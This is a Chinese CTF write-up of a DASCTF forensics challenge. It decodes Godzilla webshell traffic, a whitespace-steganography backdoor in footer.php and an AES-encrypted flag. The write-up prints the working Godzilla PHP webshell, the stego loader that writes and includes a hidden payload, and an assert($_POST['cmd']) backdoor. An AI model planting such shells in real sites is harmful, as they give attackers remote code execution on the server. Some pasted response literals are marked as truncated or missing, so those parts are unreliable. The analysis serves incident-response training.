Tags:流量分析
,应急响应
,WebShell
,哥斯拉
,Godzilla
,空白字符隐写
,AES
,DASCTF
0x00. 题目
附件路径:https://pan.baidu.com/s/1GyH7kitkMYywGC9YJeQLJA?pwd=Zmxh#list/path=/CTF附件
附件名称:20250922_QQ_backdoor.zip
0x01. WP
1. 找到上传的shell
响应体采用 md5 值分段后拼接在密文前后进行混淆，这是典型的哥斯拉（Godzilla）工具流量特征。
<?php
// Godzilla (哥斯拉) PHP webshell as uploaded, kept verbatim for reference.
// The comments describe the observable protocol so the captured traffic can be decoded.
session_start(); @set_time_limit(0); @error_reporting(0);
// E: XOR each byte of $D with the key byte at ($i+1)&15 ('+' binds tighter than '&'),
// i.e. the 16-char key is read from offset 1 and wraps back to offset 0. XOR is self-inverse,
// so the same function both encrypts and decrypts.
function E($D,$K){ for($i=0;$i<strlen($D);$i++) { $D[$i] = $D[$i]^$K[$i+1&15]; } return $D; }
function Q($D){ return base64_encode($D); }   // base64 for output
function O($D){ return base64_decode($D); }   // base64 for input
$P='pass';              // POST parameter that carries the ciphertext
$V='payload';           // session key under which the first request's plaintext is kept
$T='3c6e0b8a9c15224a';  // 16-char XOR key
if (isset($_POST[$P])){
    // Request body layout: base64( xor( base64(plaintext), $T ) )
    $F=O(E(O($_POST[$P]),$T));
    if (isset($_SESSION[$V])){
        // Every request after the first: the stored payload is eval'd, then the current
        // plaintext is handed to run(). run() is not a PHP builtin; presumably it is defined by
        // the eval'd payload — confirm from the first captured request.
        $L=$_SESSION[$V]; $A=explode('|',$L);
        class C{public function nvoke($p) {eval($p."");}}
        $R=new C(); $R->nvoke($A[0]);
        // Response framing: substr(md5($P.$T),0,16) . base64(xor(output,$T)) . substr(md5($P.$T),16).
        // The two fixed 16-char hex markers around the body are the traffic signature to look for.
        echo substr(md5($P.$T),0,16); echo Q(E(@run($F),$T)); echo substr(md5($P.$T),16);
    }else{
        // First request: stage the decrypted payload in the session; nothing is echoed.
        $_SESSION[$V]=$F;
    }
}
2. 临时改写解码脚本
分别在第 1299 帧和第 1328 帧找到压缩文件和查看环境变量的请求流量。
在线php运行环境:https://www.jyshare.com/compile/1/
<?php
function E($D,$K){
    // XOR step of the shell's encoding: every byte of $D is XORed with a key byte.
    // The key index is ($i+1)&15 ('+' binds tighter than '&'), so the 16-char key is
    // walked from offset 1 and wraps to offset 0 at i=15. Applying E twice with the
    // same key restores the original bytes.
    $length = strlen($D);
    $i = 0;
    while ($i < $length) {
        $keyByte = $K[($i + 1) & 15];
        $D[$i] = $D[$i] ^ $keyByte;
        $i++;
    }
    return $D;
}
function Q($D){
    // Base64 encoding step (used by the shell for its output).
    $encoded = base64_encode($D);
    return $encoded;
}
function O($D){
    // Base64 decoding step (used for the shell's input and for decoding its output).
    $decoded = base64_decode($D);
    return $decoded;
}
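$P='pass';              // POST parameter name; used here to rebuild the response markers
$V='payload';           // session key used by the shell; not needed by the decoder, kept for reference
$T='3c6e0b8a9c15224a';  // 16-char XOR key

/**
 * Remove the two 16-char markers the shell wraps around a response body
 * (it echoes substr(md5($P.$T),0,16) before and substr(md5($P.$T),16) after
 * the base64 ciphertext). The strip itself is positional, exactly as before;
 * in addition the ends are compared with md5($P.$T) and a warning is printed
 * when they differ, because a truncated or edited literal would otherwise lose
 * ciphertext silently.
 *
 * @param string $response full response body as captured
 * @param string $P        shell password parameter name
 * @param string $T        16-char XOR key
 * @return string          base64 ciphertext between the markers
 */
function stripMarkers($response, $P, $T) {
    $marker = md5($P . $T);
    if (substr($response, 0, 16) !== substr($marker, 0, 16) || substr($response, -16) !== substr($marker, 16)) {
        echo "[!] response markers differ from md5(P.T); check that the pasted literal is complete\n";
    }
    return substr($response, 16, strlen($response) - 32);
}

/**
 * Decode and print one captured request/response pair.
 *   request  : base64( xor( base64(plaintext), $T ) )
 *   response : prefix . base64( xor( output, $T ) ) . suffix
 *
 * @param string $label    heading printed before the decoded data
 * @param string $request  value of the POST parameter as captured
 * @param string $response full response body as captured
 * @param string $P        shell password parameter name
 * @param string $T        16-char XOR key
 * @return void
 */
function decodeFrame($label, $request, $response, $P, $T) {
    // Strip first so any marker warning appears before the decoded output.
    $ciphertext = stripMarkers($response, $P, $T);
    echo $label;
    echo "\nrequest:\n";
    echo O(E(O($request), $T));
    echo "\nresponse:\n";
    echo O(E(O($ciphertext), $T));
}

//Frame 1299: zip the web root
$request="OgRUWzZ/DUw5ZQReUGMZADBjDVsvCjMMLWVvWmVxJ103cA17N20NfTZaf2RgYTt2NgYzZzhUN0o1Wgxrf2I7ZjZaP3o4CBZDNFxdWFNgCkk5citaBlUncDZfZ1tjTgl/KVtUXAZ/CU85dABaUGM0CjRaDV8AfgpON19vW2ROJ1w6W1RiMmlcBA==";
// NOTE(review): the trailing marker in this literal is 15 hex chars ("6c37ac826a2a04b")
// while the shell emits 16, so the literal looks truncated and the positional strip
// would drop one ciphertext char. Re-paste the complete response body from the pcap.
$response="11cd6a8758984163KnUnWDh/M0kBXFYEe3w7WwBfXAMGCwJPAnlnRlB3WVQofis00QyBRWA0=6c37ac826a2a04b";
/*
request (decrypted):
cmdLine=emlwIHd3dy56aXAgLXJQICRBUEFDSEVfUlVOX1VTRVIgL3Zhci93d3cvaHRtbC8K&methodName=ZXhlY0NvbW1hbmQ=
  cmdLine    = zip www.zip -rP $APACHE_RUN_USER /var/www/html/
  methodName = execCommand
response:
adding: var/www/html/ (stored 0%)
adding: var/www/html/config.php (deflated 27%)
adding: var/www/html/Wopop_files/ (stored 0%)
adding: var/www/html/Wopop_files/google_jquery-ui.min.js (deflated 74%)
adding: var/www/html/Wopop_files/logo.png (deflated 3%)
adding: var/www/html/Wopop_files/._login_bgx.gif (deflated 44%)
adding: var/www/html/Wopop_files/login_bgx.gif (deflated 1%)
... ...
*/
decodeFrame("Frame 1299", $request, $response, $P, $T);
echo "\n\n";

//Frame 1158: dump the environment (the write-up's prose refers to frame 1328; confirm in the pcap)
$request="OgRUWzZ/DUw5ZQRTZE40SjIEBgkyaztNOWlnXVAGM3w6YVRcMm4RYAJ2TWh/cVQBOloGSAN/K002ZQUP";
// NOTE(review): the ciphertext between the markers is not preserved in this copy of the
// script; paste the captured response body here before running.
$response="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6c37ac826a2a04bc";
decodeFrame("Frame 1158", $request, $response, $P, $T);
echo "\n";
/*
Frame 1158
request (decrypted):
cmdLine=ZW52Cg==&methodName=ZXhlY0NvbW1hbmQ=
  cmdLine    = env
  methodName = execCommand
response:
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/app/admin/upload
*/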
?>
由环境变量 APACHE_RUN_USER=www-data 可知，压缩包密码为 www-data。
3. 导出压缩包找到flag.php
<?php
// Values recovered from flag.php inside www.zip: the OpenSSL cipher name and the
// base64 ciphertext (64 base64 chars = 48 bytes = three AES-128 blocks; ECB uses no IV).
[$enc, $flag] = ['aes-128-ecb', 'CN1Sq9tFItxZhsu3zCWbrdf6ozOL4eoKG0s71vGg/AKKnch3IL3jzwtXeCgWK5QP'];
?>
4. 在 footer.php 尾部发现异常
... ...
<?php
// Whitespace-steganography loader found at the tail of footer.php (kept verbatim).
// It reads the current script itself and keeps everything after the last '>' —
// i.e. the run of tabs and spaces that follows the closing ?> tag.
$cache=end(preg_split('/>/',file_get_contents(basename($_SERVER['PHP_SELF']))));
// Each 8-character group is one byte: chr(9) (tab) -> '1', chr(32) (space) -> '0', then bindec().
// $i+=7 plus the loop's own $i++ advances 8 characters per iteration.
// $out is never initialised, so the first .= operates on an undefined variable (a notice/warning, not fatal).
for($i=0;$i<strlen($cache);$i++){
    $out.=chr(bindec(str_replace(array(chr(9),chr(32)),array('1','0'),substr($cache,$i,8))));
    $i+= 7;
}
// The recovered text is base64; it is decoded into a file whose name is a single space,
// included (executed) and deleted again. Detection hints: PHP source with a long tab/space
// tail after ?>, and a transient file named ' ' appearing next to the script.
$cachepart=' ';
file_put_contents($cachepart,base64_decode($out));
include $cachepart;
unlink($cachepart);
?>
而且在其后面还有大量由 \t 和空格组成的字符串
5. 分析脚本进行解码
# chr(9)=\t=1
# chr(32)=空格(' ')=0
01010000010001000011100101110111011000010100100001000001011001110100001101101101010001100111101001100011001100100101011001111001011001000100001101100111011010110101100000110001010000100101000001010101001100010101001001100010010010100011001001001110011101000101101001000011011001000110010001001011010101000111001101100111010000110101000101101011011001110100001101010011010000010100101001000011010100110100000101001010010000110101001101000001011001110100001101010011010000010100101001001001010000010110101101001010010000110101000101101011011001110100100101000001011010110110011101001001010000010110101101100111010010010100001101000001011001110100100101000011010000010100101001000011010100110100000101001010010010010100001101000001010010100100100101000001011010110100101001000011010100110100000101100111010000110101000101101011011001110100100101000001011010110110011101001001010000110100000101100111010010010100001101000001010010100100001101010011010000010110011101001001010000010110101101100111010010010100001101000001010010100100001101010001011010110110011101001001010000010110101101100111010000110101000101101011011001110100100101000011010000010110011101000011010100110100000101100111010000110101000101101011011001110100001101010001011010110110011101001001010000110100000101001010010000110101001101000001010010100100100101000011010000010110011101001001010000010110101101001010010010010100001101000001011001110100001101010011010000010100101001000011010100110100000101100111010000110101000101101011011001110100100101000011010000010100101001000011010100110100000101100111010000110101001101000001011001110100100101000001011010110100101001001001010000010110101101001010010000110101001101000001011001110100001101010001011010110110011101001001010000110100000101100111010010010100001101000001010010100100001101010011010000010100101001001001010000110100000101100111010010010100000101101011010010100100100101000011010000010110011101000011010100110100000101100111010000110101000101101011011001110100001101010001
0110101101001010010010010100001101000001010010100100001101010011010000010110011101000011010100110100000101100111010000110101000101101011011001110100100101000011010000010110011101000011010100110100000101001010010000110101001101000001011001110100001101010001011010110110011101000011011010100011100000101011BIN2CHR=>PD9waHAgCmFzc2VydCgkX1BPU1RbJ2NtZCddKTsgCQkgCSAJCSAJCSAgCSAJIAkJCQkgIAkgIAkgICAgICAJCSAJICAJIAkJCSAgCQkgIAkgICAgICAJCSAgIAkgICAJCQkgIAkgCQkgICAgCSAgCQkgCQkgICAJCSAJICAgIAkJICAgCSAJCSAgCQkgICAJCSAgCSAgIAkJIAkJCSAgCQkgICAgICAJCSAJICAgIAkJICAgCSAgCQkgCQkJICAJCSAgCSAgCQkgICAgCSAJCSAgCQkgCj8+Base64Decode=><?php
assert($_POST['cmd']);
?>
结果中依然有由 \t 和空格组成的数据，继续解码
0110101101100101011110010010000001101001011100110010000001100010001110010110000100110110001101000011000101100110001100100011011100110000001101000011000100110111001100100110000101100110BIN2CHR=> key is b9a641f2704172af
6. AES 解码
enc = aes-128-ecb
key = b9a641f2704172af
flag = CN1Sq9tFItxZhsu3zCWbrdf6ozOL4eoKG0s71vGg/AKKnch3IL3jzwtXeCgWK5QP
最终得到flag为DASCTF{d8f191d0f0be0f039c4ededb7839218e}